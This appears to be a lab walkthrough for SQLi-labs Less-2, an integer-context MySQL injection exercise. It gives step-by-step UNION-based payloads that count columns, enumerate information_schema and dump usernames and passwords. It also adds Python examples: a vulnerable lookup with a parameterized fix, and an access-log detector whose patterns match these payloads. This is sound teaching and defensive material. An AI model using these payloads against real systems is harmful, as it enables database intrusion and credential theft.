Less-2: GET - Error based - Integer based
1. Open the original page.
2. ?id=1
3. ?id=1'
The error message contains '' LIMIT 0,1'. MySQL wraps the offending fragment in its own pair of quotes, so stripping those leaves ' LIMIT 0,1. Since the input was 1', the executed query must have been ... id = 1' LIMIT 0,1: the input is placed directly after id = with no surrounding quotes (an integer context) and is followed by LIMIT 0,1.
SQL: SELECT login_name, password FROM admin WHERE id = input LIMIT 0,1
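To make the point of the query above concrete, here is an added example (not code from the lab or from the original page) that reproduces the integer-context concatenation against a constructed in-memory SQLite table and places it beside the fixed version. The table users, the sample rows, and the function names are assumptions; SQLite has no MySQL-style 0x3a string literal, so the payload uses ':' directly, and the trailing "+" of the page's payloads is already URL-decoded to a space.

```python
import sqlite3

# Constructed sample schema and rows, not the lab's real data.
SAMPLE_ROWS = [(1, "alice", "s3cret"), (2, "bob", "hunter2")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_lookup(conn, raw_id):
    """Builds the query the way the page describes: the id parameter is pasted
    into the SQL text unquoted, so whoever supplies it controls SQL syntax."""
    sql = f"SELECT id, username, password FROM users WHERE id = {raw_id} LIMIT 0,1"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, raw_id):
    """Same lookup with the value validated as an integer and then bound as a
    parameter; anything that is not a plain integer is rejected outright."""
    try:
        id_value = int(raw_id)
    except ValueError:
        return []
    sql = "SELECT id, username, password FROM users WHERE id = ? LIMIT 0,1"
    return conn.execute(sql, (id_value,)).fetchall()


# The page's step-10 payload after URL decoding. The trailing comment marker
# swallows the " LIMIT 0,1" that the application appends.
UNION_PAYLOAD = "0 union select 1, group_concat(username || ':' || password), 3 from users-- "


def demo():
    """Runs the same input through both lookups and returns the rows each produced."""
    conn = make_db()
    return {
        "vulnerable": vulnerable_lookup(conn, UNION_PAYLOAD),
        "safe": safe_lookup(conn, UNION_PAYLOAD),
        "safe_normal": safe_lookup(conn, "1"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The vulnerable lookup returns a single row whose second column is the concatenated credentials of every user, because the UNION branch runs instead of the intended single-row lookup; the parameterized lookup returns nothing for the same input and still works for a normal id. Note that the fix is the integer validation plus the bound parameter together: binding alone would also be safe here, but validating the type first gives the application an early, loggable rejection.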
4. Find the number of columns in the query
?id=1 order by 4--+
?id=1 order by 3--+
The largest column number that does not produce an error is 3, so the query returns 3 columns.
5. Find the echo (display) positions
?id=0 union select 1,2,3--+
6. Query the database version
?id=0 union select 1,version(),3--+
7. Query the current database and user
?id=0 union select 1,database(),user()--+
The current database is named security.
8. Query the table names
?id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+
This returns all table names in the security database; we take users.
9. Query the column names
?id=0 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+
This returns all column names of the users table; we take username and password.
10. Query the user names and passwords
?id=0 union select 1,group_concat(username,0x3a,password),3 from users--+
Note: 0x3a is the hex value of the ':' character, used here as a separator between username and password.
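Every step above leaves a distinctive trace in the web server's access log, which is what a defender would look for. The following is an added example (not from the original page or the lab) that parses constructed access-log lines, URL-decodes each query parameter the way the application would, and flags the patterns this walkthrough uses: a stray quote after an integer, order by N column probing, union select, information_schema enumeration, and a trailing SQL comment. The log format, sample addresses, and signature names are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample access-log lines (not real traffic). The query strings are
# percent-encoded exactly as a browser would send the page's requests.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-2/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-2/?id=1%27 HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-2/?id=1%20order%20by%204--+ HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-2/?id=0%20union%20select%201,database(),user()--+ HTTP/1.1" 200 520
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-2/?id=0%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),3--+ HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /Less-2/?id=2 HTTP/1.1" 200 512
"""

# Common log format: client, identity, user, timestamp, request line, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures matched against each decoded, lowercased parameter value. Ordered
# roughly by the sequence in which the walkthrough uses the techniques.
SIGNATURES = {
    "column_probe": re.compile(r"\border\s+by\s+\d+"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\."),
    "sql_comment": re.compile(r"--\s|#|/\*"),
    "quote_break": re.compile(r"^\s*\d+\s*'"),  # the 1' probe in an integer parameter
}


def analyze_line(line):
    """Returns the client, decoded parameters and matched signatures for one log
    line, or None when the line does not parse as a request record."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    query = m.group("path").partition("?")[2]
    # parse_qs percent-decodes and turns '+' into a space, matching what the
    # application sees; so "--+" becomes the "-- " comment marker.
    params = parse_qs(query, keep_blank_values=True)
    hits = []
    for name, values in params.items():
        for value in values:
            lowered = value.lower()
            hits.extend(f"{name}:{sig}" for sig, rx in SIGNATURES.items() if rx.search(lowered))
    return {"ip": m.group("ip"), "params": params, "hits": hits}


def flag_requests(log_text):
    """Returns the analyzed records that matched at least one signature."""
    records = (analyze_line(line) for line in log_text.splitlines())
    return [r for r in records if r and r["hits"]]


if __name__ == "__main__":
    for record in flag_requests(SAMPLE_LOG):
        print(record["ip"], record["hits"], record["params"])
```

Decoding per parameter rather than scanning the raw URL matters: the quote probe is only suspicious at the start of a value that should be an integer, and the "+" in the comment marker is invisible until decoded. In practice the same client producing quote_break, column_probe and union_select in quick succession is the sequence worth alerting on, not any single hit.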